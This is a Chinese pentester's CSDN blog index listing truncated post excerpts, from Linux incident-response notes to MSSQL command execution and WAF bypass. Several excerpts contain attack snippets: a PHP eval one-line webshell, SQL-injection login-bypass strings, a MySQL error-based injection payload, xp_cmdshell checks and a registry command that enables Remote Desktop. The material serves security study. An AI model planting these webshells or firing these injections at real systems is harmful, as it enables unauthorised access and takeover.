justincom-CSDN博客

原创新的BLOG

百度空间是08年的时候开通的，一直陪伴这我走过了这7个年头，中间经历过了好几次改革，让我印象最深的应该是12年的那次改革，改革后只能添加10个友情链接那次吧，而且版面也换的难看死了。然后就是15年的彻底关闭，唉，好多经典的文章，好多前辈的博客就这样关闭了。其中我最为尊敬的lcx前辈的博客也就这样关闭了，里面好多经典的内网渗透的VBS啊。。。因为一直做渗透测试，要记录的东西是相当的多，平

2015-10-21 12:56:35 367

转载 Exec OS Command Via MSSQL

今天遇到了，就mark一下0x00 简介渗透测试过程中，大家经常会碰到通过MSSQL来进行提权或执行系统命令之类的操作，通常我们经常会使用xp_cmdshell来进行执行系统命令，但是当xp_cmdshell不能使用的时候，我们还有什么别的方式么？本文将介绍与分享一下我自己学到的一些姿势。0x01 常用的一些姿势1. XP_CMDSHELL这个大家都比较熟悉了，通过xp_cmd...

2018-11-09 23:57:41 1059

转载 Linux应急响应手册--SSH暴力破解

From:https://www.secpulse.com/archives/76051.html0x00 前言 SSH 是目前较可靠，专为远程登录会话和其他网络服务提供安全性的协议，主要用于给远程登录会话数据进行加密，保证数据传输的安全。SSH口令长度太短或者复杂度不够，如仅包含数字，或仅包含字母等，容易被攻击者破解，一旦被攻击者获取，可用来直接登录系统，控制服务器所有权限...

2018-09-29 13:49:49 1207 1

转载更改cmder的λ符号

找了好多文，按照上面的方法去试了，对1.3.1版本的cmder不可以。自己找了一下，在vendor文件里的profile.ps1，找到Write-Host "`nλ" -NoNewLine -ForegroundColor "DarkGray"把λ替换成想要的符号即可。作者：加_菲链接：https://www.jianshu.com/p/a42b0ee01490來源：简书...

2018-08-15 15:16:55 3834 3

原创 kali 小折腾

安装完之后，首先得用PUTTY链接SSH，发现链接不上。修改 /etc/ssh/sshd_config 28 #PermitRootLogin without-password 29 PermitRootLogin yes 53 PasswordAuthentication yesapt-get update出现了 E: 无法找到获取软件包的渠道 /usr/lib/apt/me...

2018-08-13 16:09:57 772

转载 SQL中查询同一列所有值出现的次数

user表SELECT password as 密码,COUNT(*) as 出现的次数 FROM user GROUP BY `PASSWORD`

2018-06-29 17:27:08 10058

FROM:http://blog.topspeedsnail.com/archives/160Apache访问日志记录了Apache处理的所有的请求。访问日志存储目录由CustomLog指定。下面我们来分析日志并得出有用的统计。我的Apache日志存储目录 /var/log/apache2access.log 文件几本结构示例1234138.128.75.90 - - [15/Nov/2015:1...

2018-03-20 16:41:08 1747

转载 SQL SERVER 2005 使用命令备份数据库的方法（还原）

Mark一下。From：http://www.cnblogs.com/adandelion/archive/2006/09/30/519534.html--返回由备份集内包含的数据库和日志文件列表组成的结果集。--主要获得逻辑文件名USE masterRESTORE FILELISTONLY FROM DISK = 'g:\back.Bak' Go***

2018-02-05 12:06:28 1494

转载 Linux应急响应手册

来源:http://secscorpio.top/index.php/%E5%AE%89%E5%85%A8%E4%BD%93%E7%B3%BB%E5%BB%BA%E8%AE%BE/82.html一个企业的信息安全建设,最基本的无非是要做好三件事:第一件是事前的安全基线，从源头尽可能保证新上线的系统的安全性；第二件是建立事中的监控能力，各种多维度的入侵检测，做到有针对性、及时的救火；第三件是

2018-01-22 16:58:06 3270

转载记录一下一些服务器的安全配置(随时更新)

最近没事干，对服务器的配置进行了一下折腾，在这里记录一下吧。1. 自定义apache的404界面打开httpd.conf（xampp\apache\conf\httpd.conf）方法一：使用#号注释了Include conf/extra/httpd-multilang-errordoc.conf，使之无法生效，当然其他的错误信息的配置也无法生效了。方法二：把ErrorDocume

2017-12-17 01:14:02 318

原创 WPscan升级后遇到的一些错误

最近需要对一个wp的站点进行一次测试，抄起了好久不用的wpscan来对站点进行一个前期的刺探，但是出现了一些问题，在这个地方mark一下测试环境 win7 x64+pentestbox今天用wpscan的时候爆了一个错误C:\Users\Master\Desktop> wpscan --url www.xxx.com --enumerate u_____________

2017-08-18 00:44:00 7615 1

转载我的WafBypass之道（upload篇）

好文章，值得转载：https://xianzhi.aliyun.com/forum/read/458.html0x00 前言玩waf当然也要讲究循序渐进，姊妹篇就写文件上传好了，感觉也就SQLi和Xss的WafBypass最体现发散性思维的，而文件上传、免杀、权限提升这几点的Bypass更需要的是实战的经验。本文内容为沉淀下来的总结以及一些经典案例。想到哪写到哪，所

2016-12-03 23:49:23 2473

转载无webshell的UDF提权

1.导入udf提权。因为已经是mysql的root了，所以肯定考虑用udf直接提权。现在本地虚拟机测试成功了再跑去测试目标机器，这样子安全点。首先在虚拟机搭建wamp环境，用手里的一个可以执行成功的udf提权的网马，将dll文件导入到windows目录下面，把dll文件复制出来。当然经确认这个dll文件可以正常运行的。用本地客户端navicat连接虚拟机，进入命令行模式Select h

2016-08-11 16:48:36 6672 1

转载 OPEN 3389各种姿势

REG查询REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumberREG开启REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections

2016-01-08 22:54:46 993

转载 mysql报错注入（显错注入）整理

1、通过floor暴错/*数据库版本*/and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_s

2015-11-02 20:55:41 1805 1

转载 MSSQL注射大全

总结一个比较全的MSSQL注射大全，要多玩玩手工，要不然会忘记的From：http://www.cnblogs.com/aix1314/archive/2013/03/31/2991609.htmlsql注入语句大全--是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype =

2015-11-01 02:26:34 1534

转载 asp、aspx、php、jsp万能密码大全

与其说是asp、aspx、php、jsp的万能密码还不如说是Access、Mssql、Mysql、Oracle的闭合代码了。asp aspx万能密码1："or "a"="a2： ')or('a'='a3：or 1=1--4：'or 1=1--5：a'or' 1=1--6："or 1=1--7：'or'a'='a8：

2015-10-21 12:59:51 15507

转载 Ubuntu 15.04 Chrome解决Flashplugin版本过低问题

sudo apt-get install pepperflashplugin-nonfreesudo update-pepperflashplugin-nonfree --install

2015-10-21 12:58:19 329

转载最短的各类一句话

FROM:http://zone.wooyun.org/content/23474菜刀readme.txt中附带一3个一句话： PHP: <?php @eval($_POST['chopper']);?> ASP: ASP.NET: 抛弃密码的长度不算，其实这3个一句话均不是最短的。如： PHP我们可以这样写： <?php @eval(

2015-10-20 15:56:35 1128

Master'Blog